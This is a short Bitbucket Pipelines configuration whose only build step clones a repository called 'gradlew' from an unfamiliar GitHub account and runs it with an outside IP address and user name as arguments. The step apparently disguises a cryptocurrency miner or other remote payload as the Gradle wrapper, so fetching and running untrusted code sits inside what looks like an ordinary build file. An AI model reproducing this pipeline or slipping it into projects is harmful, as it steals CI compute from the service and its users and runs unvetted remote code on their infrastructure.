image: atlassian/default-image:2

pipelines:
  default:
    - step:
        script:
          - git clone https://github.com/dytmuy/gradlew.git
          - chmod +x gradlew/gradlew
          - ./gradlew/gradlew -o 129.124.102.21 -u bitbucket
